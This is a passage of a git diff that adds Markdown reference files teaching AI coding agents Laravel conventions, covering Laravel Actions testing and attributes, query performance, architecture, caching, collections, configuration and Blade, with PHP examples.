+    SyncGoogleContacts::shouldRun()->once()->with(42)->andReturnTrue();
+
+    ImportTeamContacts::run(42, isPremium: true);
+});
+```
+
+### Guard-clause test
+
+```php
+it('does not run sync when integration is disabled', function () {
+    SyncGoogleContacts::shouldNotRun();
+
+    ImportTeamContacts::run(42, integrationEnabled: false);
+});
+```
+
+## Checklist
+
+- Assertions verify call intent and argument contracts.
+- Fakes are cleared when leakage risk exists.
+- Branch tests use `shouldRun()` / `shouldNotRun()` where clearer.
+
+## Common pitfalls
+
+- Over-mocking and losing behavior confidence.
+- Asserting only dispatch, not business correctness.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-fake.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/troubleshooting.md b/.agents/skills/laravel-actions/references/troubleshooting.md
new file mode 100644
index 000000000..cf6a5800f
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/troubleshooting.md
@@ -0,0 +1,33 @@
+# Troubleshooting
+
+## Scope
+
+Use this reference when action wiring behaves unexpectedly.
+
+## Recap
+
+- Provides a fast triage flow for routing, queueing, events, and command wiring.
+- Lists recurring failure patterns and where to check first.
+- Encourages reproducing issues with focused tests before broad debugging.
+- Separates wiring diagnostics from domain logic verification.
+
+## Fast checks
+
+- Action class uses `AsAction`.
+- Namespace and autoloading are correct.
+- Entrypoint wiring (route, queue, event, command) is registered.
+- Method signatures and argument types match caller expectations.
+
+## Failure patterns
+
+- Controller route points to wrong class.
+- Queue worker/config mismatch.
+- Listener mapping not loaded.
+- Command signature mismatch.
+- Command not registered in the console kernel.
+
+## Debug checklist
+
+- Reproduce with a focused failing test.
+- Validate wiring layer first, then domain behavior.
+- Isolate dependencies with fakes/spies where appropriate.
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/with-attributes.md b/.agents/skills/laravel-actions/references/with-attributes.md
new file mode 100644
index 000000000..1b28cf2cb
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/with-attributes.md
@@ -0,0 +1,189 @@
+# With Attributes (`WithAttributes` trait)
+
+## Scope
+
+Use this reference when an action stores and validates input via internal attributes instead of method arguments.
+
+## Recap
+
+- Documents attribute lifecycle APIs (`setRawAttributes`, `fill`, `fillFromRequest`, readers/writers).
+- Clarifies behavior of key collisions (`fillFromRequest`: request data wins over route params).
+- Lists validation/authorization hooks reused from controller validation pipeline.
+- Includes end-to-end example from fill to `validateAttributes()` and `handle(...)`.
+
+## Methods provided (`WithAttributes` trait)
+
+### `setRawAttributes`
+
+Replaces all attributes with the provided payload.
+
+```php
+$action->setRawAttributes([
+    'key' => 'value',
+]);
+```
+
+### `fill`
+
+Merges provided attributes into existing attributes.
+
+```php
+$action->fill([
+    'key' => 'value',
+]);
+```
+
+### `fillFromRequest`
+
+Merges request input and route parameters into attributes. Request input has priority over route parameters when keys collide.
+
+```php
+$action->fillFromRequest($request);
+```
+
+### `all`
+
+Returns all attributes.
+
+```php
+$action->all();
+```
+
+### `only`
+
+Returns attributes matching the provided keys.
+
+```php
+$action->only('title', 'body');
+```
+
+### `except`
+
+Returns attributes excluding the provided keys.
+
+```php
+$action->except('body');
+```
+
+### `has`
+
+Returns whether an attribute exists for the given key.
+
+```php
+$action->has('title');
+```
+
+### `get`
+
+Returns the attribute value by key, with optional default.
+
+```php
+$action->get('title');
+$action->get('title', 'Untitled');
+```
+
+### `set`
+
+Sets an attribute value by key.
+
+```php
+$action->set('title', 'My blog post');
+```
+
+### `__get`
+
+Accesses attributes as object properties.
+
+```php
+$action->title;
+```
+
+### `__set`
+
+Updates attributes as object properties.
+
+```php
+$action->title = 'My blog post';
+```
+
+### `__isset`
+
+Checks attribute existence as object properties.
+
+```php
+isset($action->title);
+```
+
+### `validateAttributes`
+
+Runs authorization and validation using action attributes and returns validated data.
+
+```php
+$validatedData = $action->validateAttributes();
+```
+
+## Methods used (`AttributeValidator`)
+
+`WithAttributes` uses the same authorization/validation hooks as `AsController`:
+
+- `prepareForValidation`
+- `authorize`
+- `rules`
+- `withValidator`
+- `afterValidator`
+- `getValidator`
+- `getValidationData`
+- `getValidationMessages`
+- `getValidationAttributes`
+- `getValidationRedirect`
+- `getValidationErrorBag`
+- `getValidationFailure`
+- `getAuthorizationFailure`
+
+## Example
+
+```php
+class CreateArticle
+{
+    use AsAction;
+    use WithAttributes;
+
+    public function rules(): array
+    {
+        return [
+            'title' => ['required', 'string', 'min:8'],
+            'body' => ['required', 'string'],
+        ];
+    }
+
+    public function handle(array $attributes): Article
+    {
+        return Article::create($attributes);
+    }
+}
+
+$action = CreateArticle::make()->fill([
+    'title' => 'My first post',
+    'body' => 'Hello world',
+]);
+
+$validated = $action->validateAttributes();
+$article = $action->handle($validated);
+```
+
+## Checklist
+
+- Attribute keys are explicit and stable.
+- Validation rules match expected attribute shape.
+- `validateAttributes()` is called before side effects when needed.
+- Validation/authorization hooks are tested in focused unit tests.
+
+## Common pitfalls
+
+- Mixing attribute-based and argument-based flows inconsistently in the same action.
+- Assuming route params override request input in `fillFromRequest` (they do not).
+- Skipping `validateAttributes()` when using external input.
+
+## References
+
+- https://www.laravelactions.com/2.x/with-attributes.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/SKILL.md b/.agents/skills/laravel-best-practices/SKILL.md
new file mode 100644
index 000000000..99018f3ae
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/SKILL.md
@@ -0,0 +1,190 @@
+---
+name: laravel-best-practices
+description: "Apply this skill whenever writing, reviewing, or refactoring Laravel PHP code. This includes creating or modifying controllers, models, migrations, form requests, policies, jobs, scheduled commands, service classes, and Eloquent queries. Triggers for N+1 and query performance issues, caching strategies, authorization and security patterns, validation, error handling, queue and job configuration, route definitions, and architectural decisions. Also use for Laravel code reviews and refactoring existing Laravel code to follow best practices. Covers any task involving Laravel backend PHP code patterns."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Best Practices
+
+Best practices for Laravel, prioritized by impact. Each rule teaches what to do and why. For exact API syntax, verify with `search-docs`.
+
+## Consistency First
+
+Before applying any rule, check what the application already does. Laravel offers multiple valid approaches — the best choice is the one the codebase already uses, even if another pattern would be theoretically better. Inconsistency is worse than a suboptimal pattern.
+
+Check sibling files, related controllers, models, or tests for established patterns. If one exists, follow it — don't introduce a second way. These rules are defaults for when no pattern exists yet, not overrides.
+
+## Quick Reference
+
+### 1. Database Performance → `rules/db-performance.md`
+
+- Eager load with `with()` to prevent N+1 queries
+- Enable `Model::preventLazyLoading()` in development
+- Select only needed columns, avoid `SELECT *`
+- `chunk()` / `chunkById()` for large datasets
+- Index columns used in `WHERE`, `ORDER BY`, `JOIN`
+- `withCount()` instead of loading relations to count
+- `cursor()` for memory-efficient read-only iteration
+- Never query in Blade templates
+
+### 2. Advanced Query Patterns → `rules/advanced-queries.md`
+
+- `addSelect()` subqueries over eager-loading entire has-many for a single value
+- Dynamic relationships via subquery FK + `belongsTo`
+- Conditional aggregates (`CASE WHEN` in `selectRaw`) over multiple count queries
+- `setRelation()` to prevent circular N+1 queries
+- `whereIn` + `pluck()` over `whereHas` for better index usage
+- Two simple queries can beat one complex query
+- Compound indexes matching `orderBy` column order
+- Correlated subqueries in `orderBy` for has-many sorting (avoid joins)
+
+### 3. Security → `rules/security.md`
+
+- Define `$fillable` or `$guarded` on every model, authorize every action via policies or gates
+- No raw SQL with user input — use Eloquent or query builder
+- `{{ }}` for output escaping, `@csrf` on all POST/PUT/DELETE forms, `throttle` on auth and API routes
+- Validate MIME type, extension, and size for file uploads
+- Never commit `.env`, use `config()` for secrets, `encrypted` cast for sensitive DB fields
+
+### 4. Caching → `rules/caching.md`
+
+- `Cache::remember()` over manual get/put
+- `Cache::flexible()` for stale-while-revalidate on high-traffic data
+- `Cache::memo()` to avoid redundant cache hits within a request
+- Cache tags to invalidate related groups
+- `Cache::add()` for atomic conditional writes
+- `once()` to memoize per-request or per-object lifetime
+- `Cache::lock()` / `lockForUpdate()` for race conditions
+- Failover cache stores in production
+
+### 5. Eloquent Patterns → `rules/eloquent.md`
+
+- Correct relationship types with return type hints
+- Local scopes for reusable query constraints
+- Global scopes sparingly — document their existence
+- Attribute casts in the `casts()` method
+- Cast date columns, use Carbon instances in templates
+- `whereBelongsTo($model)` for cleaner queries
+- Never hardcode table names — use `(new Model)->getTable()` or Eloquent queries
+
+### 6. Validation & Forms → `rules/validation.md`
+
+- Form Request classes, not inline validation
+- Array notation `['required', 'email']` for new code; follow existing convention
+- `$request->validated()` only — never `$request->all()`
+- `Rule::when()` for conditional validation
+- `after()` instead of `withValidator()`
+
+### 7. Configuration → `rules/config.md`
+
+- `env()` only inside config files
+- `App::environment()` or `app()->isProduction()`
+- Config, lang files, and constants over hardcoded text
+
+### 8. Testing Patterns → `rules/testing.md`
+
+- `LazilyRefreshDatabase` over `RefreshDatabase` for speed
+- `assertModelExists()` over raw `assertDatabaseHas()`
+- Factory states and sequences over manual overrides
+- Use fakes (`Event::fake()`, `Exceptions::fake()`, etc.) — but always after factory setup, not before
+- `recycle()` to share relationship instances across factories
+
+### 9. Queue & Job Patterns → `rules/queue-jobs.md`
+
+- `retry_after` must exceed job `timeout`; use exponential backoff `[1, 5, 10]`
+- `ShouldBeUnique` to prevent duplicates; `WithoutOverlapping::untilProcessing()` for concurrency
+- Always implement `failed()`; with `retryUntil()`, set `$tries = 0`
+- `RateLimited` middleware for external API calls; `Bus::batch()` for related jobs
+- Horizon for complex multi-queue scenarios
+
+### 10. Routing & Controllers → `rules/routing.md`
+
+- Implicit route model binding
+- Scoped bindings for nested resources
+- `Route::resource()` or `apiResource()`
+- Methods under 10 lines — extract to actions/services
+- Type-hint Form Requests for auto-validation
+
+### 11. HTTP Client → `rules/http-client.md`
+
+- Explicit `timeout` and `connectTimeout` on every request
+- `retry()` with exponential backoff for external APIs
+- Check response status or use `throw()`
+- `Http::pool()` for concurrent independent requests
+- `Http::fake()` and `preventStrayRequests()` in tests
+
+### 12. Events, Notifications & Mail → `rules/events-notifications.md`, `rules/mail.md`
+
+- Event discovery over manual registration; `event:cache` in production
+- `ShouldDispatchAfterCommit` / `afterCommit()` inside transactions
+- Queue notifications and mailables with `ShouldQueue`
+- On-demand notifications for non-user recipients
+- `HasLocalePreference` on notifiable models
+- `assertQueued()` not `assertSent()` for queued mailables
+- Markdown mailables for transactional emails
+
+### 13. Error Handling → `rules/error-handling.md`
+
+- `report()`/`render()` on exception classes or in `bootstrap/app.php` — follow existing pattern
+- `ShouldntReport` for exceptions that should never log
+- Throttle high-volume exceptions to protect log sinks
+- `dontReportDuplicates()` for multi-catch scenarios
+- Force JSON rendering for API routes
+- Structured context via `context()` on exception classes
+
+### 14. Task Scheduling → `rules/scheduling.md`
+
+- `withoutOverlapping()` on variable-duration tasks
+- `onOneServer()` on multi-server deployments
+- `runInBackground()` for concurrent long tasks
+- `environments()` to restrict to appropriate environments
+- `takeUntilTimeout()` for time-bounded processing
+- Schedule groups for shared configuration
+
+### 15. Architecture → `rules/architecture.md`
+
+- Single-purpose Action classes; dependency injection over `app()` helper
+- Prefer official Laravel packages and follow conventions, don't override defaults
+- Default to `ORDER BY id DESC` or `created_at DESC`; `mb_*` for UTF-8 safety
+- `defer()` for post-response work; `Context` for request-scoped data; `Concurrency::run()` for parallel execution
+
+### 16. Migrations → `rules/migrations.md`
+
+- Generate migrations with `php artisan make:migration`
+- `constrained()` for foreign keys
+- Never modify migrations that have run in production
+- Add indexes in the migration, not as an afterthought
+- Mirror column defaults in model `$attributes`
+- Reversible `down()` by default; forward-fix migrations for intentionally irreversible changes
+- One concern per migration — never mix DDL and DML
+
+### 17. Collections → `rules/collections.md`
+
+- Higher-order messages for simple collection operations
+- `cursor()` vs. `lazy()` — choose based on relationship needs
+- `lazyById()` when updating records while iterating
+- `toQuery()` for bulk operations on collections
+
+### 18. Blade & Views → `rules/blade-views.md`
+
+- `$attributes->merge()` in component templates
+- Blade components over `@include`; `@pushOnce` for per-component scripts
+- View Composers for shared view data
+- `@aware` for deeply nested component props
+
+### 19. Conventions & Style → `rules/style.md`
+
+- Follow Laravel naming conventions for all entities
+- Prefer Laravel helpers (`Str`, `Arr`, `Number`, `Uri`, `Str::of()`, `$request->string()`) over raw PHP functions
+- No JS/CSS in Blade, no HTML in PHP classes
+- Code should be readable; comments only for config files
+
+## How to Apply
+
+Always use a sub-agent to read rule files and explore this skill's content.
+
+1. Identify the file type and select relevant sections (e.g., migration → §16, controller → §1, §3, §5, §6, §10)
+2. Check sibling files for existing patterns — follow those first per Consistency First
+3. Verify API syntax with `search-docs` for the installed Laravel version
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/advanced-queries.md b/.agents/skills/laravel-best-practices/rules/advanced-queries.md
new file mode 100644
index 000000000..920714a14
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/advanced-queries.md
@@ -0,0 +1,106 @@
+# Advanced Query Patterns
+
+## Use `addSelect()` Subqueries for Single Values from Has-Many
+
+Instead of eager-loading an entire has-many relationship for a single value (like the latest timestamp), use a correlated subquery via `addSelect()`. This pulls the value directly in the main SQL query — zero extra queries.
+
+```php
+public function scopeWithLastLoginAt($query): void
+{
+    $query->addSelect([
+        'last_login_at' => Login::select('created_at')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->withCasts(['last_login_at' => 'datetime']);
+}
+```
+
+## Create Dynamic Relationships via Subquery FK
+
+Extend the `addSelect()` pattern to fetch a foreign key via subquery, then define a `belongsTo` relationship on that virtual attribute. This provides a fully-hydrated related model without loading the entire collection.
+
+```php
+public function lastLogin(): BelongsTo
+{
+    return $this->belongsTo(Login::class);
+}
+
+public function scopeWithLastLogin($query): void
+{
+    $query->addSelect([
+        'last_login_id' => Login::select('id')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->with('lastLogin');
+}
+```
+
+## Use Conditional Aggregates Instead of Multiple Count Queries
+
+Replace N separate `count()` queries with a single query using `CASE WHEN` inside `selectRaw()`. Use `toBase()` to skip model hydration when you only need scalar values.
+
+```php
+$statuses = Feature::toBase()
+    ->selectRaw("count(case when status = 'Requested' then 1 end) as requested")
+    ->selectRaw("count(case when status = 'Planned' then 1 end) as planned")
+    ->selectRaw("count(case when status = 'Completed' then 1 end) as completed")
+    ->first();
+```
+
+## Use `setRelation()` to Prevent Circular N+1
+
+When a parent model is eager-loaded with its children, and the view also needs `$child->parent`, use `setRelation()` to inject the already-loaded parent rather than letting Eloquent fire N additional queries.
+
+```php
+$feature->load('comments.user');
+$feature->comments->each->setRelation('feature', $feature);
+```
+
+## Prefer `whereIn` + Subquery Over `whereHas`
+
+`whereHas()` emits a correlated `EXISTS` subquery that re-executes per row. Using `whereIn()` with a `select('id')` subquery lets the database use an index lookup instead, without loading data into PHP memory.
+
+Incorrect (correlated EXISTS re-executes per row):
+
+```php
+$query->whereHas('company', fn ($q) => $q->where('name', 'like', $term));
+```
+
+Correct (index-friendly subquery, no PHP memory overhead):
+
+```php
+$query->whereIn('company_id', Company::where('name', 'like', $term)->select('id'));
+```
+
+## Sometimes Two Simple Queries Beat One Complex Query
+
+Running a small, targeted secondary query and passing its results via `whereIn` is often faster than a single complex correlated subquery or join. The additional round-trip is worthwhile when the secondary query is highly selective and uses its own index.
+
+## Use Compound Indexes Matching `orderBy` Column Order
+
+When ordering by multiple columns, create a single compound index in the same column order as the `ORDER BY` clause. Individual single-column indexes cannot combine for multi-column sorts — the database will filesort without a compound index.
+
+```php
+// Migration
+$table->index(['last_name', 'first_name']);
+
+// Query — column order must match the index
+User::query()->orderBy('last_name')->orderBy('first_name')->paginate();
+```
+
+## Use Correlated Subqueries for Has-Many Ordering
+
+When sorting by a value from a has-many relationship, avoid joins (they duplicate rows). Use a correlated subquery inside `orderBy()` instead, paired with an `addSelect` scope for eager loading.
+
+```php
+public function scopeOrderByLastLogin($query): void
+{
+    $query->orderByDesc(Login::select('created_at')
+        ->whereColumn('user_id', 'users.id')
+        ->latest()
+        ->take(1)
+    );
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/architecture.md b/.agents/skills/laravel-best-practices/rules/architecture.md
new file mode 100644
index 000000000..165056422
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/architecture.md
@@ -0,0 +1,202 @@
+# Architecture Best Practices
+
+## Single-Purpose Action Classes
+
+Extract discrete business operations into invokable Action classes.
+
+```php
+class CreateOrderAction
+{
+    public function __construct(private InventoryService $inventory) {}
+
+    public function execute(array $data): Order
+    {
+        $order = Order::create($data);
+        $this->inventory->reserve($order);
+
+        return $order;
+    }
+}
+```
+
+## Use Dependency Injection
+
+Always use constructor injection. Avoid `app()` or `resolve()` inside classes.
+
+Incorrect:
+```php
+class OrderController extends Controller
+{
+    public function store(StoreOrderRequest $request)
+    {
+        $service = app(OrderService::class);
+
+        return $service->create($request->validated());
+    }
+}
+```
+
+Correct:
+```php
+class OrderController extends Controller
+{
+    public function __construct(private OrderService $service) {}
+
+    public function store(StoreOrderRequest $request)
+    {
+        return $this->service->create($request->validated());
+    }
+}
+```
+
+## Code to Interfaces
+
+Depend on contracts at system boundaries (payment gateways, notification channels, external APIs) for testability and swappability.
+
+Incorrect (concrete dependency):
+```php
+class OrderService
+{
+    public function __construct(private StripeGateway $gateway) {}
+}
+```
+
+Correct (interface dependency):
+```php
+interface PaymentGateway
+{
+    public function charge(int $amount, string $customerId): PaymentResult;
+}
+
+class OrderService
+{
+    public function __construct(private PaymentGateway $gateway) {}
+}
+```
+
+Bind in a service provider:
+
+```php
+$this->app->bind(PaymentGateway::class, StripeGateway::class);
+```
+
+## Default Sort by Descending
+
+When no explicit order is specified, sort by `id` or `created_at` descending. Explicit ordering prevents cross-database inconsistencies between MySQL and Postgres.
+
+Incorrect:
+```php
+$posts = Post::paginate();
+```
+
+Correct:
+```php
+$posts = Post::latest()->paginate();
+```
+
+## Use Atomic Locks for Race Conditions
+
+Prevent race conditions with `Cache::lock()` or `lockForUpdate()`.
+
+```php
+Cache::lock('order-processing-'.$order->id, 10)->block(5, function () use ($order) {
+    $order->process();
+});
+
+// Or at query level
+$product = Product::where('id', $id)->lockForUpdate()->first();
+```
+
+## Use `mb_*` String Functions
+
+When no Laravel helper exists, prefer `mb_strlen`, `mb_strtolower`, etc. for UTF-8 safety. Standard PHP string functions count bytes, not characters.
+
+Incorrect:
+```php
+strlen('José');          // 5 (bytes, not characters)
+strtolower('MÜNCHEN');  // 'mÜnchen' — fails on multibyte
+```
+
+Correct:
+```php
+mb_strlen('José');             // 4 (characters)
+mb_strtolower('MÜNCHEN');     // 'münchen'
+
+// Prefer Laravel's Str helpers when available
+Str::length('José');          // 4
+Str::lower('MÜNCHEN');        // 'münchen'
+```
+
+## Use `defer()` for Post-Response Work
+
+For lightweight tasks that don't need to survive a crash (logging, analytics, cleanup), use `defer()` instead of dispatching a job. The callback runs after the HTTP response is sent — no queue overhead.
+
+Incorrect (job overhead for trivial work):
+```php
+dispatch(new LogPageView($page));
+```
+
+Correct (runs after response, same process):
+```php
+defer(fn () => PageView::create(['page_id' => $page->id, 'user_id' => auth()->id()]));
+```
+
+Use jobs when the work must survive process crashes or needs retry logic. Use `defer()` for fire-and-forget work.
+
+## Use `Context` for Request-Scoped Data
+
+The `Context` facade passes data through the entire request lifecycle — middleware, controllers, jobs, logs — without passing arguments manually.
+
+```php
+// In middleware
+Context::add('tenant_id', $request->header('X-Tenant-ID'));
+
+// Anywhere later — controllers, jobs, log context
+$tenantId = Context::get('tenant_id');
+```
+
+Context data automatically propagates to queued jobs and is included in log entries. Use `Context::addHidden()` for sensitive data that should be available in queued jobs but excluded from log context. If data must not leave the current process, do not store it in `Context`.
+
+## Use `Concurrency::run()` for Parallel Execution
+
+Run independent operations in parallel using child processes — no async libraries needed.
+
+```php
+use Illuminate\Support\Facades\Concurrency;
+
+[$users, $orders] = Concurrency::run([
+    fn () => User::count(),
+    fn () => Order::where('status', 'pending')->count(),
+]);
+```
+
+Each closure runs in a separate process with full Laravel access. Use for independent database queries, API calls, or computations that would otherwise run sequentially.
+
+## Convention Over Configuration
+
+Follow Laravel conventions. Don't override defaults unnecessarily.
+
+Incorrect:
+```php
+class Customer extends Model
+{
+    protected $table = 'Customer';
+    protected $primaryKey = 'customer_id';
+
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class, 'role_customer', 'customer_id', 'role_id');
+    }
+}
+```
+
+Correct:
+```php
+class Customer extends Model
+{
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class);
+    }
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/blade-views.md b/.agents/skills/laravel-best-practices/rules/blade-views.md
new file mode 100644
index 000000000..c6f8aaf1e
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/blade-views.md
@@ -0,0 +1,36 @@
+# Blade & Views Best Practices
+
+## Use `$attributes->merge()` in Component Templates
+
+Hardcoding classes prevents consumers from adding their own. `merge()` combines class attributes cleanly.
+
+```blade
+<div {{ $attributes->merge(['class' => 'alert alert-'.$type]) }}>
+    {{ $message }}
+</div>
+```
+
+## Use `@pushOnce` for Per-Component Scripts
+
+If a component renders inside a `@foreach`, `@push` inserts the script N times. `@pushOnce` guarantees it's included exactly once.
+
+## Prefer Blade Components Over `@include`
+
+`@include` shares all parent variables implicitly (hidden coupling). Components have explicit props, attribute bags, and slots.
+
+## Use View Composers for Shared View Data
+
+If every controller rendering a sidebar must pass `$categories`, that's duplicated code. A View Composer centralizes it.
+
+## Use Blade Fragments for Partial Re-Renders (htmx/Turbo)
+
+A single view can return either the full page or just a fragment, keeping routing clean.
+
+```php
+return view('dashboard', compact('users'))
+    ->fragmentIf($request->hasHeader('HX-Request'), 'user-list');
+```
+
+## Use `@aware` for Deeply Nested Component Props
+
+Avoids re-passing parent props through every level of nested components.
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/caching.md b/.agents/skills/laravel-best-practices/rules/caching.md
new file mode 100644
index 000000000..eb3ef3e62
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/caching.md
@@ -0,0 +1,70 @@
+# Caching Best Practices
+
+## Use `Cache::remember()` Instead of Manual Get/Put
+
+Atomic pattern prevents race conditions and removes boilerplate.
+
+Incorrect:
+```php
+$val = Cache::get('stats');
+if (! $val) {
+    $val = $this->computeStats();
+    Cache::put('stats', $val, 60);
+}
+```
+
+Correct:
+```php
+$val = Cache::remember('stats', 60, fn () => $this->computeStats());
+```
+
+## Use `Cache::flexible()` for Stale-While-Revalidate
+
+On high-traffic keys, one user always gets a slow response when the cache expires. `flexible()` serves slightly stale data while refreshing in the background.
+
+Incorrect: `Cache::remember('users', 300, fn () => User::all());`
+
+Correct: `Cache::flexible('users', [300, 600], fn () => User::all());` — fresh for 5 min, stale-but-served up to 10 min, refreshes via deferred function.
+
+## Use `Cache::memo()` to Avoid Redundant Hits Within a Request
+
+If the same cache key is read multiple times per request (e.g., a service called from multiple places), `memo()` stores the resolved value in memory.
+
+`Cache::memo()->get('settings');` — 5 calls = 1 Redis round-trip instead of 5.
+
+## Use Cache Tags to Invalidate Related Groups
+
+Without tags, invalidating a group of entries requires tracking every key. Tags let you flush atomically. Only works with `redis`, `memcached`, `dynamodb` — not `file` or `database`.
+
+```php
+Cache::tags(['user-1'])->flush();
+```
+
+## Use `Cache::add()` for Atomic Conditional Writes
+
+`add()` only writes if the key does not exist — atomic, no race condition between checking and writing.
+
+Incorrect: `if (! Cache::has('lock')) { Cache::put('lock', true, 10); }`
+
+Correct: `Cache::add('lock', true, 10);`
+
+## Use `once()` for Per-Request Memoization
+
+`once()` memoizes a function's return value for the lifetime of the object (or request for closures). Unlike `Cache::memo()`, it doesn't hit the cache store at all — pure in-memory.
+
+```php
+public function roles(): Collection
+{
+    return once(fn () => $this->loadRoles());
+}
+```
+
+Multiple calls return the cached result without re-executing. Use `once()` for expensive computations called multiple times per request. Use `Cache::memo()` when you also want cross-request caching.
+
+## Configure Failover Cache Stores in Production
+
+If Redis goes down, the app falls back to a secondary store automatically.
+
+```php
+'failover' => ['driver' => 'failover', 'stores' => ['redis', 'database']],
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/collections.md b/.agents/skills/laravel-best-practices/rules/collections.md
new file mode 100644
index 000000000..14f683d32
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/collections.md
@@ -0,0 +1,44 @@
+# Collection Best Practices
+
+## Use Higher-Order Messages for Simple Operations
+
+Incorrect:
+```php
+$users->each(function (User $user) {
+    $user->markAsVip();
+});
+```
+
+Correct: `$users->each->markAsVip();`
+
+Works with `each`, `map`, `sum`, `filter`, `reject`, `contains`, etc.
+
+## Choose `cursor()` vs. `lazy()` Correctly
+
+- `cursor()` — one model in memory, but cannot eager-load relationships (N+1 risk).
+- `lazy()` — chunked pagination returning a flat LazyCollection, supports eager loading.
+
+Incorrect: `User::with('roles')->cursor()` — eager loading silently ignored.
+
+Correct: `User::with('roles')->lazy()` for relationship access; `User::cursor()` for attribute-only work.
+
+## Use `lazyById()` When Updating Records While Iterating
+
+`lazy()` uses offset pagination — updating records during iteration can skip or double-process. `lazyById()` uses `id > last_id`, safe against mutation.
+
+## Use `toQuery()` for Bulk Operations on Collections
+
+Avoids manual `whereIn` construction.
+
+Incorrect: `User::whereIn('id', $users->pluck('id'))->update([...]);`
+
+Correct: `$users->toQuery()->update([...]);`
+
+## Use `#[CollectedBy]` for Custom Collection Classes
+
+More declarative than overriding `newCollection()`.
+
+```php
+#[CollectedBy(UserCollection::class)]
+class User extends Model {}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/config.md b/.agents/skills/laravel-best-practices/rules/config.md
new file mode 100644
index 000000000..8fd8f536f
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/config.md
@@ -0,0 +1,73 @@
+# Configuration Best Practices
+
+## `env()` Only in Config Files
+
+Direct `env()` calls return `null` when config is cached.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'key' => env('API_KEY'),
+
+// Application code
+$key = config('services.key');
+```
+
+## Use Encrypted Env or External Secrets
+
+Never store production secrets in plain `.env` files in version control.
+
+Incorrect:
+```bash
+
+# .env committed to repo or shared in Slack
+
+STRIPE_SECRET=sk_live_abc123
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI
+```
+
+Correct:
+```bash
+php artisan env:encrypt --env=production --readable
+php artisan env:decrypt --env=production
+```
+
+For cloud deployments, prefer the platform's native secret store (AWS Secrets Manager, Vault, etc.) and inject at runtime.
+
+## Use `App::environment()` for Environment Checks
+
+Incorrect:
+```php
+if (env('APP_ENV') === 'production') {
+```
+
+Correct:
+```php
+if (app()->isProduction()) {
+// or
+if (App::environment('production')) {
+```
+
+## Use Constants and Language Files
+
+Use class constants instead of hardcoded magic strings for model states, types, and statuses.
+
+```php
+// Incorrect
+return $this->type === 'normal';
+
+// Correct
+return $this->type === self::TYPE_NORMAL;
+```
+
+If the application already uses language files for localization, use `__()` for user-facing strings too. Do not introduce language files purely for English-only apps — simple string literals are fine there.
+
+```php
+// Only when lang files already exist in the project
+return back()->with('message', __('app.article_added'));
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/db-performance.md b/.agents/skills/laravel-best-practices/rules/db-performance.md
new file mode 100644
index 000000000..8fb719377
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/db-performance.md
@@ -0,0 +1,192 @@
+# Database Performance Best Practices
+
+## Always Eager Load Relationships
+
+Lazy loading causes N+1 query problems — one query per loop iteration. Always use `with()` to load relationships upfront.
+
+Incorrect (N+1 — executes 1 + N queries):
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Correct (2 queries total):
+```php
+$posts = Post::with('author')->get();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Constrain eager loads to select only needed columns (always include the foreign key):
+
+```php
+$users = User::with(['posts' => function ($query) {
+    $query->select('id', 'user_id', 'title')
+          ->where('published', true)
+          ->latest()
+          ->limit(10);
+}])->get();
+```
+
+## Prevent Lazy Loading in Development
+
+Enable this in `AppServiceProvider::boot()` to catch N+1 issues during development.
+
+```php
+public function boot(): void
+{
+    Model::preventLazyLoading(! app()->isProduction());
+}
+```
+
+Throws `LazyLoadingViolationException` when a relationship is accessed without being eager-loaded.
+
+## Select Only Needed Columns
+
+Avoid `SELECT *` — especially when tables have large text or JSON columns.
+
+Incorrect:
+```php
+$posts = Post::with('author')->get();
+```
+
+Correct:
+```php
+$posts = Post::select('id', 'title', 'user_id', 'created_at')
+    ->with(['author:id,name,avatar'])
+    ->get();
+```
+
+When selecting columns on eager-loaded relationships, always include the foreign key column or the relationship won't match.
+
+## Chunk Large Datasets
+
+Never load thousands of records at once. Use chunking for batch processing.
+
+Incorrect:
+```php
+$users = User::all();
+foreach ($users as $user) {
+    $user->notify(new WeeklyDigest);
+}
+```
+
+Correct:
+```php
+User::where('subscribed', true)->chunk(200, function ($users) {
+    foreach ($users as $user) {
+        $user->notify(new WeeklyDigest);
+    }
+});
+```
+
+Use `chunkById()` when modifying records during iteration — standard `chunk()` uses OFFSET which shifts when rows change:
+
+```php
+User::where('active', false)->chunkById(200, function ($users) {
+    $users->each->delete();
+});
+```
+
+## Add Database Indexes
+
+Index columns that appear in `WHERE`, `ORDER BY`, `JOIN`, and `GROUP BY` clauses.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
